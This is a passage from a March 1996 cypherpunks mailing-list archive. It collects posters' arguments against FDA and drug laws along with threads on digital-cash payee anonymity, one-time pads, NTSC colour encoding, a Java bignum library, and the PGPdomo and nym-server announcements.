>>not right to have to "give it up" to the State, allowing no one else to
>>engage in the mental exercise and follow-through.
>>
>>   ..
>>Blanc
>>I hope I'm not the only one here who thinks so.

How could you be? Since I was the one who cited the example, I clearly am
opposed to the current monopoly on judgment the FDA enjoys.

As to Asgaard and his claim that the FDA is to be trusted, he is welcome to
trust them. I don't think they are _dishonest_, merely in thrall (*) to
special interests, drug companies, and, above all, to bureaucratic
stodginess.

(* Asgaard should be happy that I am using a word derived from Old Norse,
"thrall," as in "enthralling." A thrall was a slave in Icelandic and Old
Norse.)

His speculation that my friend's mildly retarded son is not helped is
unknowable to him. In fact, the nootropic in question, Piracetam, is sold
in Europe (and Mexico, as I noted), and elsewhere, for the treatment of
Alzheimer's, dementia, and to alleviate mild retardation. My friend thinks
it gives his son an improvement from, say, an IQ of 70 to perhaps an IQ of
75. Apparently this is an important difference, so much so that when his
supply of Piracetam (nicely packaged from Glaxo Pharmaceuticals of England)
ran out, and the FDA had tightened shipping rules and he was unable to
order it through the mail from his usual Canadian source, he felt the
strong need to drive to Tijuana to buy his son a significant supply.

(A few years ago I also bought some nootropics in TJ. I felt no effect. My
friend thinks the effect is greater at the impaired-end of the spectrum,
which actually fits with the prescribed-usage patterns noted above.)

Whether my friend is deluding himself or not, it is not for men with guns
to tell him he may not buy something to consume. The "drug laws" are
nothing more than "dietary laws," and have virtually nothing to do with
public or personal safety. If safety was the issue, then the drug ethanol,
which kills at least 40,000 Americans a year would  be outlawed while
marijuana and narcotics, which kill far fewer (even when police raids,
overdoses, and illegality-related crimes are included) would not be the
focus of drug laws. Tobacco, which kills an estimated 400,000 a year is the
winner. (The statistics I saw a few years ago were easily memorizable:
tobacco: 400,000, alchohol: 40,000, drugs: 4,000.)

Don't think I am advocating illegalization of booze or cigarettes. Free
people are free to consume what they choose. (The issue of driving while
impaired, or operating heavy machinery, or posting to the CP list while
impaired, is a separable issue. We don't illegalize alchohol, we illegalize
drunk driving. And my drug-using acquaintances are drastically less likely
to be "DUI" with marijuana or LSD than drinkers are with alcohol.)

We are not free when someone tells us which foods and herbs are legal to
eat, and which are not.

(I'll spare the usual stuff about how the Founders smoke a pipe of cannabis
now and then, how "canvas" comes from the Dutch word for this herb, how
special interests got hemp and "reefer" outlawed, and how the effects fell
mainly on the poor and inner-city folks.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 16 Mar 1996 13:54:25 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: Tim's friend's mildly retarded son
In-Reply-To: <ad6f75c41302100402cd@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960315212743.11119B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Mar 1996, Timothy C. May wrote:
[...]
> it gives his son an improvement from, say, an IQ of 70 to perhaps an IQ of
> 75. Apparently this is an important difference, so much so that when his
[...]
> (A few years ago I also bought some nootropics in TJ. I felt no effect. My

Headline:
	Drugs Fail to Raise Tim May's IQ to 75

Simon // "Bad journalists live for moments like these"

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Mar 1996 13:24:00 +0800
To: cypherpunks@toad.com
Subject: RE: Tim's friend's mildly retarded son
Message-ID: <ad6f8af514021004fd4e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:16 AM 3/16/96, Timothy C. May wrote:

>(I'll spare the usual stuff about how the Founders smoke a pipe of cannabis
>now and then, how "canvas" comes from the Dutch word for this herb, how
>special interests got hemp and "reefer" outlawed, and how the effects fell
>mainly on the poor and inner-city folks.)

I meant "and how the effects of criminalization fell mainly on the poor and
inner-city folks."

Just thought I should make this clear, because many who advocate drug laws
do so out of some notion that by illegalizing some drug they are _helping_
the poor folks. In fact, they are helping to destroy inner cities by making
illegal drugs a profitable thing to trade.

And since people living in cities are more likely to come in contact with
police than are folks living in suburban areas, the implications of
illegality are even more strongly felt.

Far removed from crypto, except the the sort of thinking that says the FDA
and DEA know best what people ought to be allowed to buy and ingest is very
similar to the thinking that government agencies know best what codes and
ciphers people ought to be allowed to use.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 16 Mar 1996 18:49:43 +0800
To: corey@hedgehog.mcom.com (Corey Bridges)
Subject: Re: Cypherpunks reference in Netscape book
Message-ID: <199603160637.WAA14724@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 3/15/96 -0800, you wrote:
>I'm writing the "Encryption and SSL" chapter for the Netscape products, and
>I'm finishing it up with a "Further reading" section that lists
>crypto-related books, web sites, and newsgroups. I was thinking of including
>a reference to this mailing list.
>
>Any strong opinions either way?

The big problem with the list isn't just signal-to-noise,
it's VOLUME VOLUME VOLUME - you don't want somebody to subscribe
and get flodded with 100 messages/day without warning.
(There's also the problem with newbies sending us mail
saying "please send me some anarkist crypt0 warez, d00ds!"

If you're going to refer to the list, please mention
        - the cypherpunks home page is www.csua.berkeley.edu/cypherpunks
        - you can browse the list with a news reader at nntp.hks.net
                and with the web at www.hks.net (delayed a bit).
        - the list is high volume, 50-100 messages/day,
        - there are lots of readers, 500-1000, who get all the mail sent to
the list.
        - if you want to unsubscribe, send mail to majordomo@toad.com, saying
                help
        - oh, BTW, if you _do_ want to subscribe, cypherpunks-request@toad.com
                is the canonical location, and majordomo@toad.com is the droid.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 16 Mar 1996 15:06:10 +0800
To: cypherpunks@toad.com
Subject: Re:  Kid Gloves or Megaphones
Message-ID: <199603160637.WAA14730@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:11 PM 3/14/96 -0800, Eric wrote:
> The debate which must be taken to the public
>is whether we want payee anonymity or not.  I am confident that people
>want their privacy and are willing to let others have theirs as well.

My initial impression of Chaum's work, from his 1985 CACM paper,
was that the technology gave you strong anonymity; I was surprised
when I first saw references to payees _not_ being anonymous
(subject to the usual limitations of getting the digicash to them
anonymously and getting the service you want from them anonymously.)
We've had discussions on this list about topics like kidnap ransom,
which need payee anonymity to make sense at all; we later had discussions
about how to provide it given that it wasn't a standard feature.

So first we need to tell people that the technology _won't_ provide
payee anonymity unless used carefully, and then we need to tell them
that it _can_ provide anonymity if you want it....

Depending on the details of Ian's method, I don't think the debate
needs to be taken to the public, or even done - it may simply be a
done deal once the technology's out there.  If Mark Twain Bank or
Merita Bank or the Federal <Exonive-Deleted> Reserve wants to offer Digicash(tm)
with Payee-Non-Anonymity, they can always make it a contractual requirement
that their payees not use anonymity techniques in return for being paid.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sat, 16 Mar 1996 19:14:21 +0800
To: Asgaard <cypherpunks@toad.com
Subject: Re: Tim's friend's mildly retarded son
Message-ID: <199603160749.XAA04114@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:50 PM 3/15/96 +0100, Asgaard wrote:
> FDA has a very good reputation 

This is not correct:  The FDA has a thoroughly villainous reputation.

Among other things it engages in corruption and extortion.  Companies who
want their stuff approved hire ex FDA "advisors".  There is ample evidence
that these advisors do no actual work, the FDA simply knocks back applications
that fail to pay large sums to their friends.  Indeed one company recently
won a court case on this ground.

The FDA is famous for grotesque scientific incompetence, (as for example its
recent showboating on silicone), for playing to the gallery, for simple
extortion, as a court recently found, for corruptly excluding drugs that 
people who are not well connected wish to sell and for corruptly 
approving the often identical drugs that people who are well connected 
wish to sell, and for a callous and light hearted disregard for human
lives.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 16 Mar 1996 17:03:21 +0800
To: jamesd@echeque.com
Subject: Re: FCC-type Regulation of Cyberspace
Message-ID: <199603160808.AAA00980@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:18 AM 3/15/96 -0800, you wrote:
>Timothy C. May wrote:
>>>Mr. Frantz, unless you can prove your claims here, forthwith, I must inform
>>>you that they are in violation of the Truth in Speech Act of 1996. Please
>>>retract them, now.
>
>Bill Frantz wrote:
>>Political speech, not commercial speech.  The act doesn't apply or is
>>unconstitutional.
>
>I see:  The bill of rights reads: 
>"Congress shall make no law [...] abridging the freedom of *political*
>speech".   
>Never knew that until now. 

Non-election-related political speech only, of course.  And excepting support
for Communism or opposition to Prohibition or to approved wars, or to
anything the military does to get them approved.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 16 Mar 1996 17:06:56 +0800
To: cme@cybercash.com (Carl Ellison)
Subject: Re: Man in the middle attacks
Message-ID: <199603160809.AAA00996@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:30 AM 3/14/96 -0500, cme@cybercash.com (Carl Ellison) wrote:
>Take, for example, my bank account.  I go to my bank today and open an
>account.  I give them my SSN and sign a form.  They give me an account
>number.
>Given digital signatures, I still go to them, give them my SSN and
>digitally sign a form.  They give me an account number.  They keep, in a
>database of their own [rather than some CA's database] my name, SSN, public
>key and whatever other identifying information they need to feel warm and
>fuzzy about tracking me down in case of fraud.  

The SSN isn't there for tracking you down in case of fraud.
It's there because the IRS insists they collect it on interest-bearing accounts
so they can tax you.  Your driver's license, if they ask for that,
is something they want to see for fraud prevention, because that's
harder to fake than an SSN.  And your SSN is a perfectly appropriate thing
to use with a key-centered approach: "This is my SSN, please use it for my
bank account",
signed key 123456789.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 17 Mar 1996 10:42:40 +0800
To: Hal <hfinney@shell.portal.com>
Subject: RE: Java bignum package
Message-ID: <199603160809.AAA01000@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:08 PM 3/15/96 -0800, Hal Finney wrote:
>My implementation is purely in Java, so it is much slower than one which
>uses native methods, although I don't think native methods can be sent
>across the net automatically like applets, so until they are widely
>distributed a pure-Java implementation may have some advantages.

Does Java have a run-time way to do
        #if_exists library_X
                foo = library_X.method_a(bar, baz)
        #else
                foo = library_Y.method_a(bar, baz)
        #endif
or equivalent?  This would let you distribute a slow pure-java library
that's compatible to a native-mode library and use whichever you need.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 17 Mar 1996 10:45:23 +0800
To: Blanc Weber <blancw@MICROSOFT.com>
Subject: RE: Tim's friend's mildly retarded son
Message-ID: <199603160809.AAA01009@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:16 PM 3/15/96 -0800, Blanc or somebody she was replying to wrote:
>>	.... Tobacco, which kills an estimated 400,000 a year is the
>>	winner. (The statistics I saw a few years ago were easily memorizable:
>>	tobacco: 400,000, alchohol: 40,000, drugs: 4,000.)

99% of US drug deaths are from legal drugs.

Alcohol's more like 100,000, as of 1990 figures, about 20% of US drug deaths;
this is just disease-related deaths, excluding drunk driving.
Tobacco was about 370K or 390K, roughly 75%.  
Prescription drugs were about 20,000, including suicides, and I don't
know if this included prescription opiates like morphine and codeine.
Caffeine, my personal favorite, is 5000-10000, though it's much harder
to estimate how much it really contributes to heart attack deaths.
Cocaine was about 2500, heroin 2000, PCP 700, the rest lower, total about 1%.
Marijuana was its usual 0 deaths.

As Tim says, it's far from crypto - but one of the main excuses for 
money-laundering laws is to track down pharmaceutical wholesalers' profits.


#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 17 Mar 1996 10:42:56 +0800
To: bruce@omega.co.nz
Subject: Re: CD-reading for random keys
Message-ID: <199603160809.AAA01012@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 AM 3/14/96 GMT, bruce@omega.co.nz wrote:
>The "entropy" or randomness of audio data is LOW. That's why audio compresses
>so well. However, the idea of keeping a one-time key on CD-ROM is good. 

Actually, the idea's not real good - CDROMs are easy to keep around, 
last a long time, and are generally not eraseable - this encourages using them
as a More Than One Time Pad, which is a really bad idea.....  

Tape is better - it's easy to write garbage over it as you go along,
it doesn't have that feel of permanence about it, and it's easy to
use for something else besides selling as Musique Concre'te or 
Rainforest Ocean Background Harmonies.

If you're going to use audio as a source, even FM radio hiss (using one of
those new radio-in-your-PC cards), compress it first, then feed it
to some encryption algorithm or shove it through MD5 to lose any
remaining patterns if you can.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 16 Mar 1996 17:06:34 +0800
To: cypherpunks@toad.com
Subject: RE: Tim's friend's mildly retarded son  [NOISE]
Message-ID: <199603160809.AAA01015@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:31 PM 3/15/96 -0800, Simon Spero <ses@tipper.oit.unc.edu> wrote:
>Tim May> (A few years ago I also bought some nootropics in TJ. I felt no
effect. My
>
>Headline:
>	Drugs Fail to Raise Tim May's IQ to 75
>
>Simon // "Bad journalists live for moments like these"

Hey, in Cyberspace, nobody can tell you're not a _real_ journalist.

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 17 Mar 1996 10:45:43 +0800
To: cypherpunks@toad.com
Subject: Release of PGPdomo version 0.2
Message-ID: <199603160809.AAA01022@ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


We've recently discussed PGP-enhanced majordomo, and
just by coincidence, there's a new version.

>Return-Path: <majordom@hawww.ha.osd.mil>
>Date: Fri, 15 Mar 1996 14:29:07 -0500
>From: phollins@hawww.ha.osd.mil
>To: majordomo-workers@greatcircle.com, pgpdomo-announce@hawww.ha.osd.mil,
>        pgpdomo-users@hawww.ha.osd.mil
>Subject: Release of PGPdomo version 0.2
>Cc: 
>Sender: owner-pgpdomo-announce@hawww.ha.osd.mil
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>
>PGPdomo version 0.2 is now available as Public Domain freeware at:
>
>	ftp://hawww.ha.osd.mil/pgpdomo/pgpdomo.tar.Z
>	ftp://hawww.ha.osd.mil/pgpdomo/pgpdomo.tar.Z.md5
>	ftp://hawww.ha.osd.mil/pgpdomo/README
>
>PGPdomo is an integration of PGP and Majordomo 1.93 allowing you
>to manage encrypted mailing lists from any UNIX platform.
>
>PGPdomo contains perl source replacement programs (and config files)
>for Majordomo 1.93.  You must have PGP and Majordomo 1.93 functional
>before installing PGPdomo.
>
>Version 0.2 adds new commands, more logging, tweaks, and bug fixes.
>
>Comments and suggestions welcome!
>
>Patrick Hollins
>phollins@hawww.ha.osd.mil
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMUm9uWYiTeh15gbBAQHysAP/W6rvXRTd437ISOoo/piCsn2gESceSA92
>jiVarMl6XqhRAvf1mpqsQiTa3uywqbuEpyu0EmnZ/cUIYbgpwMi/RCO7AqUFmb7I
>hL6RDt9X1fhg4BGS/NiHJ1tG9GHWR1zlzj+KHaK1oPT4YGdNnBgwGQUZdmAmRYp+
>nCoDJdZZ6jk=
>=QAay
>-----END PGP SIGNATURE-----
>
>
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sat, 16 Mar 1996 09:22:55 +0800
To: Gary Howland <gary@kampai.euronet.nl>
Subject: Re: Beat Remote Monitor Snooping?
In-Reply-To: <199603142054.VAA04403@kampai.euronet.nl>
Message-ID: <31498f9a.89133975@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Mar 1996 21:54:10 +0100, Gary Howland wrote:

> NTSC (TV video) modulation is done by phase modulation of the 3.579545 MHz
> subcarrier.

This is not correct.  I'd suggest you go back and re-read your NTSC
references.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eggplant@inlink.com (eggplant)
Date: Sat, 16 Mar 1996 16:59:30 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <v01510102ad65718732c1@[206.196.98.116]>
MIME-Version: 1.0
Content-Type: text/plain


>Jim McCoy wrote:
>| Two problems:
>|
>|         1- Chaum did not have the clue to pick up on this when two
>|            cypherpunks (who shall remain nameless...) pitched this
>|            and several other ideas to involve ISPs in jump-starting
>|            ecash almost two years ago, so why would he figure it out
>|            now?
>
>        But now we don't need no stinkin' license.  We just use Mark
>Twain ecash.
>
>        The big problem with this is that net phones can be subject to
>delay & drop out, and I don't want to deal with that when I'm talking
>on the phone.
>
>Adam
>
>--
>"It is seldom that liberty of any kind is lost all at once."
>                                                       -Hume


One thing to remember, this is still a developing program. With the
increasing of bandwith and the development of new and better compression
algorithyms, this will slowly fade. This is only the begining. In a couple
years, the transmision and reception could be as good, if not better than
the normal telephone, you never know.

--
"... In Germany they first came for the Communists and I
didn't speak up because I wasn't a Communist. Then they came
for the Jews, and I didn't speak up because I wasn't a Jew.
Then they came for the trade unionists, and I didn't speak
up because I wasn't a trade unionist.  Then they came for
Catholics, and I didn't speak up because I was a Protestant.
Then they came for me-and by that time no one was left to
speak up..." Pastor Martin Niemoller

++++++++++++
**************************************
*	 Matthew Murphy	------------ eggplant@inlink.com
*   ----------
*   http://www.inlink.com/~eggplant
*   The Web page is under construciton at this time though..
*   Please don't mind the mess....	
*									   		   																													     	
**************************************
++++++++++++
finger eggplant@inlink.com for my PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eggplant@inlink.com (eggplant)
Date: Sun, 17 Mar 1996 10:45:35 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <v01510104ad6572a575eb@[206.196.98.116]>
MIME-Version: 1.0
Content-Type: text/plain


>>(deleted)
>
>Granted.  Of course it is quite a jump to claim that a software program is a
>"Long Distance Carrier."  If I run Winsock on my machine and a Winsock
>application like Iphone, if anyone is the LD carrier, *I* am because I am
>digitizing my voice and doing the first part of the switching necessary to
>send the packets on their way.  Maybe the FCC should bust *me* for
>practicing telecommunications without a license.  It would make for an
>interesting case.
>
>DCF

So is telecommunications defined as voice transmision? Couldn't Cu-Seeme be
defined as telecommunications also? Or how about the transmission of
digital data in general since that's one place where telecom companies are
investing.


--
"... In Germany they first came for the Communists and I
didn't speak up because I wasn't a Communist. Then they came
for the Jews, and I didn't speak up because I wasn't a Jew.
Then they came for the trade unionists, and I didn't speak
up because I wasn't a trade unionist.  Then they came for
Catholics, and I didn't speak up because I was a Protestant.
Then they came for me-and by that time no one was left to
speak up..." Pastor Martin Niemoller

++++++++++++
**************************************
*	 Matthew Murphy	------------ eggplant@inlink.com
*   ----------
*   http://www.inlink.com/~eggplant
*   The Web page is under construciton at this time though..
*   Please don't mind the mess....	
*									   		   																													     	
**************************************
++++++++++++
finger eggplant@inlink.com for my PGP key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@vishnu.alias.net>
Date: Sat, 16 Mar 1996 20:27:17 +0800
To: cypherpunks@toad.com
Subject: Re: Release of PGPdomo version 0.2
In-Reply-To: <199603160809.AAA01022@ix14.ix.netcom.com>
Message-ID: <199603161216.GAA15373@vishnu.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Bill" == Bill Stewart <stewarts@ix.netcom.com> writes:


    Bill> We've recently discussed PGP-enhanced majordomo, and just by
    Bill> coincidence, there's a new version.

	And I have it running on vishnu.alias.net. Check out the new
and improved cypher-list.

 John Perry - KG5RG - perry@vishnu.alias.net -  PGP-encrypted e-mail welcome!
 WWW - http://www.alias.net
 PGP 2.62 key for perry@vishnu.alias.net is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMUqxJKghiWHnUu4JAQHKkQf/aDmxe45wqUFTW3la3Zqfl4DXlGqD8tZg
eXiVHw1U+O9ail4J8bnKBDVxd007o+Td/5xrMVK8mF749sKwmf7gXAHT+iHhM13p
CAHqIQkrJtWl4+7PL5TAyCdruGnf3m+2ciUfYOqhv8RI0XB3DrPEVSoTXe01Coq5
RUoOdDgmSfL74/uqGKGA9Zz50QOP7tPPTFTl/iYrbFA4J6zTsW3HzFMpc6QR0o+n
UOgT5rW77cAcbSChm8iIul5gD8fxjtTBd9UvfGK5XkVM7VIVBzql6teZo8Muci/W
8jUhJ23veJTZs+y4EpTN/jWFb2yT5jAbROpiAuiJerC67C/+Y5+xWA==
=Pb+X
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Sat, 16 Mar 1996 18:52:41 +0800
To: jim bell <jimbell@pacifier.com>
Subject: [NOISE] NTSC color encoding
In-Reply-To: <m0txlRT-00090rC@pacifier.com>
Message-ID: <314a5cb4.141647874@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Mar 1996 18:10:59 -0800, Jim Bell wrote:

> At 12:18 AM 3/16/96 GMT, John Lull wrote:
>
> >This is not correct.  I'd suggest you go back and re-read your NTSC
> >references.
> 
> If that's not correct, what is?  And it's been years since I read NTSC; I 
> don't even know if I now have ready access to the information.  Merely 
> saying that it's wrong isn't particularly informative, especially if you 
> choose to copy it to the list.

A detailed discussion of NTSC (or PAL, or SECAM, or any other video
standard) color encoding is hardly cypherpunks material.  I posted to
the list ONLY because I'd hate to see anyone rely on your posting.  A
simple heads-up warning should be enough for most people to realize
they need to look up a more authoritative source if they really need
to know how this stuff works.

If no one replied publicly to such inaccurate postings, the internet
would quickly degenerate to the "Net of a Million Lies" of fiction.
If everyone replied publicly and in excruciating detail to every
off-topic but inaccurate posting, there would be so much noise on the
list very little could be accomplished.  I should, of course, have
added [NOISE] to the subject line in my origial response, and for not
doing so I apologize to the list.

The color components in NTSC (there are 2 of them, not just one) are
carried as essentially double-sideband suppressed carrier signals at
the color subcarrier frequency, both phase-locked to the color bursts,
but with the two carriers in quadrature.  Although the sum of these
signals does vary in phase, it is CLEARLY distinct from a phase
modulated signal since it also varies in amplitude.  A phase-modulated
signal would not do so.

If you feel a burning desire to pursue this further, PLEASE take it to
e-mail.  I'll not be replying to any further posts to the list on this
topic.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 17 Mar 1996 00:23:01 +0800
To: cypherpunks@toad.com
Subject: RE: Java bignum package
Message-ID: <199603161559.HAA03547@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Bill Stewart <stewarts@ix.netcom.com>
> Does Java have a run-time way to do
>         #if_exists library_X
>                 foo = library_X.method_a(bar, baz)
>         #else
>                 foo = library_Y.method_a(bar, baz)
>         #endif
> or equivalent?  This would let you distribute a slow pure-java library
> that's compatible to a native-mode library and use whichever you need.

Bill is referring to an announcement I made elsewhere about a bignum
package I am working on in Java.  Take a look at <URL:
http://www.portal.com/~hfinney/bignum/bigarithtest.html> to play with a
little interactive "calculator" I made with it.  You need a Java enabled
browser to use it.

I think Bill's idea is a good one but I will discuss it further on
coderpunks since it gets into some technical aspects of Java that may not
be of general interest.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NSA Spook <mixmaster@spook.alias.net>
Date: Sun, 17 Mar 1996 00:18:04 +0800
To: mail2news@myriad.alias.net
Subject: New Nym Server! (cubed)
Message-ID: <199603161557.JAA25901@riker.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


Hello everyone!

	There is a new nymserver on the net! alias@alias.alias.net 
(cubed) is running the Alpha code by Matt Ghio (ghio@myriad.alias.net). 
It's short name on Raph's list will be "cubed" with an actual email 
address of alias@alias.alias.net. Enjoy!

Here's the public key:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzFKvt4AAAEEALz0GGp2todRpJsnPUUPo5dLK4b/xY6BEmh5H/v0Ujx3TuiU
Bz++YxyGfcps1m0GpXp61hzSA1QDyhQFIMn98yyG7uzmeS1O3KX3/a5941+EO3yQ
Vov8WkkewHxuSv62KcweynQjct0K+aeUopjzHvo6C/c0c5bzYTxTYiwGgKGpAAUR
tCxUaGUgQ3ViZWQgTnltIFNlcnZlciA8YWxpYXNAYWxpYXMuYWxpYXMubmV0Pg==
=i/Px
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 17 Mar 1996 00:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: Beat Remote Monitor Snooping?
Message-ID: <960316110359_169928015@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


The whole 'to NTSC, or not to NTSC" debate is irrelevant, since VGA monitors
use  seperate red, green, blue, and sync signals that are not modulated on
any carrier.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Media Distribution <102774.1273@compuserve.com>
Date: Sun, 17 Mar 1996 01:58:01 +0800
To: CYPHERPUNKS <cypherpunks@toad.com>
